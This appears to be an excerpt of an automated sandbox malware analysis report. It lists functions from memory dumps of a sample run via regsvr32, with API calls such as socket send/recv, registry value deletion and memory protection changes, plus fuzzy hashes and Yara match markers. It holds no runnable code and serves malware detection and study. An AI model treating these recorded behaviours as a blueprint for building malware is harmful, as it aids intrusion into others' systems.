Instruction Fuzzy Hash: 9B21803C258A0D8FE756AFA8D4547E976D1FF49304F80442DD94AC3390DB749886CF52

Function 02E623B0 Relevance: 9.1, APIs: 6, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 02E623C9
WideCharToMultiByte.KERNEL32 ref: 02E62420
WideCharToMultiByte.KERNEL32 ref: 02E6245B
free.LIBCMT ref: 02E62468
FreeEnvironmentStringsW.KERNEL32 ref: 02E62473
FreeEnvironmentStringsW.KERNEL32 ref: 02E62481

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: EnvironmentStrings$ByteCharFreeMultiWide$free
String ID:
API String ID: 517548149-0
Opcode ID: 5115370a6637f46d455a6b6ed31cd9b9a6bc26a856794a30b061c6b7729e81b1
Instruction ID: ca27aa207b3d091b5eb347f6bfc6fddcb3cb074abcebc96974ef76872002bf18
Opcode Fuzzy Hash: 5115370a6637f46d455a6b6ed31cd9b9a6bc26a856794a30b061c6b7729e81b1
Instruction Fuzzy Hash: BF21627269578086DB249F62B44876A77A5F788BD8F4C9024DE8A07F18DF3CD050C744

Function 02E452F0 Relevance: 9.1, APIs: 6, Instructions: 66synchronizationtimeCOMMON

Download Yara Rule

APIs

ResetEvent.KERNEL32 ref: 02E4530C
ResetEvent.KERNEL32 ref: 02E45319
timeGetTime.WINMM ref: 02E4531F
WaitForSingleObject.KERNEL32 ref: 02E45373
ResetEvent.KERNEL32 ref: 02E45390

Part of subcall function 02E44D20: GetCurrentThreadId.KERNEL32 ref: 02E44D2D

ResetEvent.KERNEL32 ref: 02E453B7

Part of subcall function 02E5576C: _errno.LIBCMT ref: 02E55797
Part of subcall function 02E5576C: _invalid_parameter_noinfo.LIBCMT ref: 02E557A2

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: EventReset$CurrentObjectSingleThreadTimeWait_errno_invalid_parameter_noinfotime
String ID:
API String ID: 2543248268-0
Opcode ID: 492e06cf4619c2e6ba0829753654616a12db9333c9bbbb47ed89defe3f5a3c1e
Instruction ID: 8818e57b640c8f9351a648407b9a2d5dd52ca3a4d430e47e4079b3fcb4a016de
Opcode Fuzzy Hash: 492e06cf4619c2e6ba0829753654616a12db9333c9bbbb47ed89defe3f5a3c1e
Instruction Fuzzy Hash: E2213736244A9086DB41CF25F84835DB3A4FB98F9CF589522DE4E97B68DF38C982C740

Function 02E44D20 Relevance: 9.1, APIs: 6, Instructions: 57networkthreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 02E44D2D

Part of subcall function 02E44100: SwitchToThread.KERNEL32 ref: 02E4413E
Part of subcall function 02E44100: SetLastError.KERNEL32 ref: 02E44185

send.WS2_32 ref: 02E44D79
SetEvent.KERNEL32 ref: 02E44D97
WSACloseEvent.WS2_32 ref: 02E44DAB
shutdown.WS2_32 ref: 02E44DC4
closesocket.WS2_32 ref: 02E44DCE

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: EventThread$CloseCurrentErrorLastSwitchclosesocketsendshutdown
String ID:
API String ID: 779811758-0
Opcode ID: b4979450ec0c19de12122228c918dce67c8ffdc185b34bad9865e685935668f6
Instruction ID: fccfda234edcd2882beacd018b5ace3e5a511992cee96b070d46236ddf32d134
Opcode Fuzzy Hash: b4979450ec0c19de12122228c918dce67c8ffdc185b34bad9865e685935668f6
Instruction Fuzzy Hash: D321EF3275068186DB149F3AF8587197362FB99FACF546321DA3A47AD8DF34C885C740

Function 02E5DF0C Relevance: 9.0, APIs: 6, Instructions: 37threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 02E5DF16
FlsGetValue.KERNEL32 ref: 02E5DF24
SetLastError.KERNEL32 ref: 02E5DF7C

Part of subcall function 02E5A860: Sleep.KERNEL32 ref: 02E5A8A5

FlsSetValue.KERNEL32 ref: 02E5DF50
free.LIBCMT ref: 02E5DF73

Part of subcall function 02E5DE54: _lock.LIBCMT ref: 02E5DEA8
Part of subcall function 02E5DE54: _lock.LIBCMT ref: 02E5DEC7

GetCurrentThreadId.KERNEL32 ref: 02E5DF64

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: ErrorLastValue_lock$CurrentSleepThreadfree
String ID:
API String ID: 3106088686-0
Opcode ID: ad1fb755669453110f52bd1be8a0bd03a16cf7015427440e3a7436090f7943d3
Instruction ID: c2b228509f0babe7d16d8833f99bfb4ca5d35d48355563d8ccc9d3598dbe6e26
Opcode Fuzzy Hash: ad1fb755669453110f52bd1be8a0bd03a16cf7015427440e3a7436090f7943d3
Instruction Fuzzy Hash: AD01673569074186EF049F66E85C36872A2BB58BA5F18E234DD2B03B94EF3CC405C620

Function 02871970 Relevance: 9.0, APIs: 7, Instructions: 259COMMON

Download Yara Rule

APIs

free.LIBCMT ref: 028719DF
free.LIBCMT ref: 02871A2F
free.LIBCMT ref: 02871A7F
free.LIBCMT ref: 02871ACF
free.LIBCMT ref: 02871AFA
free.LIBCMT ref: 02871B1B

Part of subcall function 02879030: _errno.LIBCMT ref: 02879050

free.LIBCMT ref: 02871B59

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: free$_errno
String ID:
API String ID: 2288870239-0
Opcode ID: 032b138e252d8cb97ad2d4774b9f54bdca08d78cdba61d487e36b433dbb5637c
Instruction ID: 0723cdfc8b3fa025da132299e096d90b7bb18b582aa474effcd665fd81f6dcda
Opcode Fuzzy Hash: 032b138e252d8cb97ad2d4774b9f54bdca08d78cdba61d487e36b433dbb5637c
Instruction Fuzzy Hash: 07915A79116A4A8FC795EF6CC088B69F7E1FF59308B1844AEC04EDB621C771E892CB51

Function 02883A50 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 224COMMONLIBRARYCODE

Download Yara Rule

APIs

_getptd.LIBCMT ref: 02883A81
_getptd.LIBCMT ref: 02883A9F
_CallSETranslator.LIBCMT ref: 02883AE7

Part of subcall function 02881CB4: _getptd.LIBCMT ref: 02881CDB

Strings

RCC, xrefs: 02883ABD
MOC, xrefs: 02883AB5

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: _getptd$CallTranslator
String ID: MOC$RCC
API String ID: 3569367362-2084237596
Opcode ID: 71d4d7f3723b5425788edb4ff7159e0c2d35ca9445fe2397f069a4d9efb0fa2f
Instruction ID: dc78a02430edc6a4c191ee18e3ec78d844d6e2c6b7d4b4e6affaa9d72bd05ea9
Opcode Fuzzy Hash: 71d4d7f3723b5425788edb4ff7159e0c2d35ca9445fe2397f069a4d9efb0fa2f
Instruction Fuzzy Hash: CA61A438118B0A8FD724FF58C4457E9B3E2FF80718F544AAED489C7515DBB4A692CB82

Function 02E594DC Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 143COMMONLIBRARYCODE

Download Yara Rule

APIs

_getptd.LIBCMT ref: 02E5950D

Part of subcall function 02E5DF90: _amsg_exit.LIBCMT ref: 02E5DFA6

_getptd.LIBCMT ref: 02E5952B
_CallSETranslator.LIBCMT ref: 02E59573

Part of subcall function 02E577B4: _getptd.LIBCMT ref: 02E577DB

Strings

RCC, xrefs: 02E59549
MOC, xrefs: 02E59541

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _getptd$CallTranslator_amsg_exit
String ID: MOC$RCC
API String ID: 1374396951-2084237596
Opcode ID: af59dbc463a79ad219f14499a5ba5a340a132d3c24739908f5f8128250e8645e
Instruction ID: d67df28b66ab66ce3037e0c4ef0b1c912abf66ebe9b3b522c633533121ca62b2
Opcode Fuzzy Hash: af59dbc463a79ad219f14499a5ba5a340a132d3c24739908f5f8128250e8645e
Instruction Fuzzy Hash: 5D51B072664AE0D5CF20DB15E0903ADB3A1FB81B8CF05A526EF5E47618DBB8C165CB50

Function 02E41940 Relevance: 8.9, APIs: 7, Instructions: 135COMMON

Download Yara Rule

APIs

free.LIBCMT ref: 02E419AF
free.LIBCMT ref: 02E419FF
free.LIBCMT ref: 02E41A4F
free.LIBCMT ref: 02E41A9F
free.LIBCMT ref: 02E41ACA
free.LIBCMT ref: 02E41AEB
free.LIBCMT ref: 02E41B29

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: b55e574dcef07286ea42fa4fc00e6fe334b5dcd76448c2a0d4ff0b76fb3ee2ea
Instruction ID: 3d37f6bce1a0119136e15cab1336acf2cc03375fbe9d14f628624ec9b9594f8d
Opcode Fuzzy Hash: b55e574dcef07286ea42fa4fc00e6fe334b5dcd76448c2a0d4ff0b76fb3ee2ea
Instruction Fuzzy Hash: CB51F236282B8485CE64DF99E5803ADB365F708B88F5CE012CB8E5B710DF78E4A1D325

Function 02E57EB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

APIs

_fileno.LIBCMT ref: 02E57ED4

Part of subcall function 02E62988: _errno.LIBCMT ref: 02E62991
Part of subcall function 02E62988: _invalid_parameter_noinfo.LIBCMT ref: 02E6299C

_errno.LIBCMT ref: 02E57F3D
_invalid_parameter_noinfo.LIBCMT ref: 02E57F48
_getbuf.LIBCMT ref: 02E57F7C

Strings

@, xrefs: 02E57F99

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo$_fileno_getbuf
String ID: @
API String ID: 3036866907-2766056989
Opcode ID: 92bb1f8a3983eb5cf48ea023ccb70438d663d5b0186222f9965649d0791287cf
Instruction ID: d54efacdcbe1d4f95143e4519c3eca480ad046b0c817a6bdb62de6cac0defaf1
Opcode Fuzzy Hash: 92bb1f8a3983eb5cf48ea023ccb70438d663d5b0186222f9965649d0791287cf
Instruction Fuzzy Hash: E731BB63170BA485CF29CF3AD444328B651E751BACF58F245DF6A062E5CB78C4A1C3A1

Function 02E59055 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32 ref: 02E590A8
_getptd.LIBCMT ref: 02E5905D

Part of subcall function 02E5DF90: _amsg_exit.LIBCMT ref: 02E5DFA6

_getptd.LIBCMT ref: 02E5911F
_getptd.LIBCMT ref: 02E5912B

Strings

csm, xrefs: 02E590DF

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _getptd$ExceptionRaise_amsg_exit
String ID: csm
API String ID: 4155239085-1018135373
Opcode ID: 553b0e037f61d14c01cc02cf9b2f8149e3dae0138a7a1939c678450fe90a323b
Instruction ID: 91e206e07dd4506a64a88e02ef2fa2ffa38ffd7a789deb842bd8c86071ed2041
Opcode Fuzzy Hash: 553b0e037f61d14c01cc02cf9b2f8149e3dae0138a7a1939c678450fe90a323b
Instruction Fuzzy Hash: B2217C362546A0C7C730DF12E04479EB361F789BA9F059226DF9A07B55CB3AD886CB60

Function 02E4E6F1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 02E4E714
RegDeleteValueW.ADVAPI32 ref: 02E4E725
RegCloseKey.ADVAPI32 ref: 02E4E72F

Strings

IpDatespecial, xrefs: 02E4E71E
Console, xrefs: 02E4E6F8

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID: Console$IpDatespecial
API String ID: 849931509-1840232981
Opcode ID: fe9ff08b8168959544f01ab8a0301821abe9536671df0fbfa079717db41a1f95
Instruction ID: 4d60a9891d840af294a29e03bc8e242bcf6d07e5fea829d0973a45f7324f9b97
Opcode Fuzzy Hash: fe9ff08b8168959544f01ab8a0301821abe9536671df0fbfa079717db41a1f95
Instruction Fuzzy Hash: EBF05E37759981C6EB60DB65F808B89B334F794BACF005111CE5D13A98DF38C189C700

Function 02E65244 Relevance: 7.7, APIs: 5, Instructions: 168COMMON

Download Yara Rule

APIs

free.LIBCMT ref: 02E652D7
__free_lconv_num.LIBCMT ref: 02E653AB
free.LIBCMT ref: 02E653B7
free.LIBCMT ref: 02E65466
free.LIBCMT ref: 02E65472

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: free$__free_lconv_num
String ID:
API String ID: 1547021563-0
Opcode ID: 3af7023e6504110db29df3efcdcc5bcf3b4445538e5297c523f39fa9476b72f6
Instruction ID: fb8528b545e0bc340c18f964a3762f58863f447352d0bb1accc758e6bf21b813
Opcode Fuzzy Hash: 3af7023e6504110db29df3efcdcc5bcf3b4445538e5297c523f39fa9476b72f6
Instruction Fuzzy Hash: 7B51C232395B848ACB60DF66E4447AA77A1F788BC8F94A526EF8E47714DF78C142C740

Function 02E5C638 Relevance: 7.6, APIs: 5, Instructions: 115COMMONLIBRARYCODE

Download Yara Rule

APIs

_fileno.LIBCMT ref: 02E5C655

Part of subcall function 02E62988: _errno.LIBCMT ref: 02E62991
Part of subcall function 02E62988: _invalid_parameter_noinfo.LIBCMT ref: 02E6299C

_errno.LIBCMT ref: 02E5C665
_errno.LIBCMT ref: 02E5C681
_isatty.LIBCMT ref: 02E5C6E2
_getbuf.LIBCMT ref: 02E5C6EE

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _errno$_fileno_getbuf_invalid_parameter_noinfo_isatty
String ID:
API String ID: 2574049805-0
Opcode ID: 954e8c99a8900c331c29789858b1bedd508e20dff7a8ac605596c6e7a6fc1fdf
Instruction ID: 761d74b2e7db0263f99a7006d9d302dc0037cf93ddd6c8da471405887c7fccae
Opcode Fuzzy Hash: 954e8c99a8900c331c29789858b1bedd508e20dff7a8ac605596c6e7a6fc1fdf
Instruction Fuzzy Hash: B441E5726A0B6486DB189F38C46032D77A0E784F98F24F216DF6A477D4DBB8C591CB80

Function 02E512F0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 02E5131F
SetLastError.KERNEL32 ref: 02E513B2

Strings

Main, xrefs: 02E51302

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: ErrorLast
String ID: Main
API String ID: 1452528299-521822810
Opcode ID: b2a94ced38afb3e22c07dba05b3cc46be14585edf82a77f9e8eff251cf469d4b
Instruction ID: bcced76132d3a52a7c9a6be3d792ddac651d40b3ac6dcad9324b6b3272bbc830
Opcode Fuzzy Hash: b2a94ced38afb3e22c07dba05b3cc46be14585edf82a77f9e8eff251cf469d4b
Instruction Fuzzy Hash: 29416A76760A60CADB14CF15E05476D73A1F748B88F459125DF8D4BB48DB38E852CB44

Function 02E50CC0 Relevance: 7.6, APIs: 5, Instructions: 107COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32 ref: 02E50CFC
realloc.LIBCMT ref: 02E50D63

Part of subcall function 02E56FB8: malloc.LIBCMT ref: 02E56FD5

IsBadReadPtr.KERNEL32 ref: 02E50DE9
SetLastError.KERNEL32 ref: 02E50E0A
SetLastError.KERNEL32 ref: 02E50E28

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: ErrorLastRead$mallocrealloc
String ID:
API String ID: 3638135368-0
Opcode ID: 10d6ceea749d552203bf34d92a345c17516fdb6c7073bfd954073bc12734bd9a
Instruction ID: 017e5f0036f52b167040ffe7868e9269af01c067ca65888646cdf895bf0253d4
Opcode Fuzzy Hash: 10d6ceea749d552203bf34d92a345c17516fdb6c7073bfd954073bc12734bd9a
Instruction Fuzzy Hash: DD413836251B94CBDF248F16F8547AAB7A0FB48B98F489425EF8A07B24DF78E045C710

Function 02E5B5F0 Relevance: 7.6, APIs: 5, Instructions: 105COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 02E5B616
_invalid_parameter_noinfo.LIBCMT ref: 02E5B621
_getptd.LIBCMT ref: 02E5B62D
_lock.LIBCMT ref: 02E5B666
_lock.LIBCMT ref: 02E5B6F9

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _lock$_errno_getptd_invalid_parameter_noinfo
String ID:
API String ID: 2808128820-0
Opcode ID: 87a3bca82977cd9d54f1f39a71e6bafcd63422e4aa423f7f8be8756c9ddb47b7
Instruction ID: d04546df8e94e13ce64bb3754a621b663296256e868f5b00980884d917f51ce6
Opcode Fuzzy Hash: 87a3bca82977cd9d54f1f39a71e6bafcd63422e4aa423f7f8be8756c9ddb47b7
Instruction Fuzzy Hash: 4041C5352A56A085EB04EB22D95477A73A2FB45BCCF04E229EE4D47798DF79C041CB10

Function 02E63ED8 Relevance: 7.6, APIs: 5, Instructions: 102COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 02E63F32
malloc.LIBCMT ref: 02E63F96
MultiByteToWideChar.KERNEL32 ref: 02E63FDE
GetStringTypeW.KERNEL32 ref: 02E63FF5
free.LIBCMT ref: 02E64009

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: ByteCharMultiWide$StringTypefreemalloc
String ID:
API String ID: 307345228-0
Opcode ID: 82f0262a8cecbef224ca61b156e5a0f0d612a4380812b26c100bd67c1e5a9d7b
Instruction ID: a59d50ee0f1d6393fe7082df25f6d4abebe9688f2d24ce78af15367f0b69650d
Opcode Fuzzy Hash: 82f0262a8cecbef224ca61b156e5a0f0d612a4380812b26c100bd67c1e5a9d7b
Instruction Fuzzy Hash: A1318372290B809ADB109F26D8047A973A6FB48FFCF589656EE6D47BD4DF38C0418740

Function 02E4C6D0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 02E4C703

Part of subcall function 02E552C0: _FF_MSGBANNER.LIBCMT ref: 02E552F0
Part of subcall function 02E552C0: HeapAlloc.KERNEL32 ref: 02E55315
Part of subcall function 02E552C0: _callnewh.LIBCMT ref: 02E5532E
Part of subcall function 02E552C0: _errno.LIBCMT ref: 02E55339
Part of subcall function 02E552C0: _errno.LIBCMT ref: 02E55344

free.LIBCMT ref: 02E4C72B
CreateDIBSection.GDI32 ref: 02E4C797
free.LIBCMT ref: 02E4C7B6

Part of subcall function 02E4D020: GetObjectW.GDI32 ref: 02E4D052

free.LIBCMT ref: 02E4C7F6

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: free$_errno$AllocCreateHeapObjectSection_callnewhmalloc
String ID:
API String ID: 2034203143-0
Opcode ID: 909639d14f8662df755ceb05cb6a705d2a69ecb05bda05ce9b7b934898073f82
Instruction ID: b481d0266d225aab12e3f58a950d6268f964ba9c48dc0b3b5d1fa0321dc9b9cf
Opcode Fuzzy Hash: 909639d14f8662df755ceb05cb6a705d2a69ecb05bda05ce9b7b934898073f82
Instruction Fuzzy Hash: BB31923634678087DB259F22E40076AB6A5FB88BC8F5CE426DF8957B24EF38D011CB00

Function 02E448F0 Relevance: 7.6, APIs: 5, Instructions: 91networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 02E44924
SetLastError.KERNEL32 ref: 02E4495E
WSAGetLastError.WS2_32 ref: 02E449B2
WSASetLastError.WS2_32 ref: 02E44A08
GetLastError.KERNEL32 ref: 02E44A17

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: ErrorLast$recv
String ID:
API String ID: 316788870-0
Opcode ID: be8605be28e57c5448ca43f127e085b1cff2f5d855780fd9c761576df26d9ebe
Instruction ID: 3466b948ba3b86da744dd7c428db47732f73c6971a764cddd56ab2099dbc9770
Opcode Fuzzy Hash: be8605be28e57c5448ca43f127e085b1cff2f5d855780fd9c761576df26d9ebe
Instruction Fuzzy Hash: 7231BC72344A8186EB209F39F44839D37A1F749B8CF54A522DF1983BA8DF39C484EB01

Function 02E6CBF0 Relevance: 7.6, APIs: 5, Instructions: 87COMMON

Download Yara Rule

APIs

_ctrlfp.LIBCMT ref: 02E6CC31
_exception_enabled.LIBCMT ref: 02E6CC54

Part of subcall function 02E6CB34: _set_statfp.LIBCMT ref: 02E6CB5B
Part of subcall function 02E6CB34: _set_statfp.LIBCMT ref: 02E6CBCE

_raise_exc.LIBCMT ref: 02E6CCA0
_ctrlfp.LIBCMT ref: 02E6CCE0
_ctrlfp.LIBCMT ref: 02E6CD11

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: _ctrlfp$_set_statfp$_exception_enabled_raise_exc
String ID:
API String ID: 3456427917-0
Opcode ID: 6d0b5b3ad2c709662f382e20db8cab413169064652d1349d93ce4c8a5f060bc7
Instruction ID: 6683416276cc468c4719d0332b31e51f52c7eaf6f1a32d012596340fb325bd32
Opcode Fuzzy Hash: 6d0b5b3ad2c709662f382e20db8cab413169064652d1349d93ce4c8a5f060bc7
Instruction Fuzzy Hash: AE318432654E848AD751DF25E84876FB776F78A3D8F506216FE8917A18DF38C446CB00

Function 02E564A4 Relevance: 7.6, APIs: 5, Instructions: 80memorythreadCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 02E564F6
GetSystemInfo.KERNEL32 ref: 02E5650D
SetThreadStackGuarantee.KERNEL32 ref: 02E5651F
VirtualAlloc.KERNEL32 ref: 02E56572
VirtualProtect.KERNEL32 ref: 02E5658C

Memory Dump Source

Source File: 00000005.00000002.2927512318.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000005.00000002.2927512318.0000000002E89000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e40000_regsvr32.jbxd

Similarity

API ID: Virtual$AllocGuaranteeInfoProtectQueryStackSystemThread
String ID:
API String ID: 513674450-0
Opcode ID: 1024e802668d761e8f9f1b2b79f1ec6faa9c774cb7cb2bbf6b7d463fff73795d
Instruction ID: 695e25a6e2e495c6cf3976d7e219f3d70c39191acd6ad6ab97175749c1e0bad3
Opcode Fuzzy Hash: 1024e802668d761e8f9f1b2b79f1ec6faa9c774cb7cb2bbf6b7d463fff73795d
Instruction Fuzzy Hash: F4314136390A959ADB24CF31E8547D933A8F748B8CF8895269E4E87B48DF38D645C740

Function 028813CC Relevance: 7.6, APIs: 5, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 028813E5
__doserrno.LIBCMT ref: 02881462
_errno.LIBCMT ref: 02881469

Memory Dump Source

Source File: 00000005.00000002.2927074227.0000000002871000.00000020.10000000.00040000.00000000.sdmp, Offset: 02871000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2871000_regsvr32.jbxd

Similarity

API ID: _errno$__doserrno
String ID:
API String ID: 2614100947-0
Opcode ID: 9c10f4dddecf88ff0f614810f4e23f27c8e3f15c21c1131958e96a886f5cc72c
Instruction ID: ffcbd31af70282862cd43402295dd6f2158aea929f79d046b9be48bdae2d37cb
Opcode Fuzzy Hash: 9c10f4dddecf88ff0f614810f4e23f27c8e3f15c21c1131958e96a886f5cc72c
Instruction Fuzzy Hash: 2C21023C6086458EE714BFACD8D977D7692EF85324F09461CD45ECB2E1DB748842CBA2

Function 028C1AD9 Relevance: 7.6, APIs: 5, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 028C1AF2
__doserrno.LIBCMT ref: 028C1B6F
_errno.LIBCMT ref: 028C1B76

Memory Dump Source

Source File: 00000005.00000002.2927165195.00000000028B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_28b0000_regsvr32.jbxd

Yara matches

Similarity

API ID: _errno$__doserrno
String ID:
API String ID: 2614100947-0
Opcode ID: 1e62d9c386a74b43a65d93e3c78ab7b1f09407b89e46e5cb920697f667b46571
Instruction ID: 7bd1a2741a539f0303f4adcab51a3834ad2da37fca94016e55a246c09bf05355
Opcode Fuzzy Hash: 1e62d9c386a74b43a65d93e3c78ab7b1f09407b89e46e5cb920697f667b46571
Instruction Fuzzy Hash: 2021353C704B054EE3196FAC98D937D7A92EF46324F25456CD55EC7292EB74C8408F92

Function 02E558E4 Relevance: 7.6, APIs: 5, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32 ref: 02E5590D
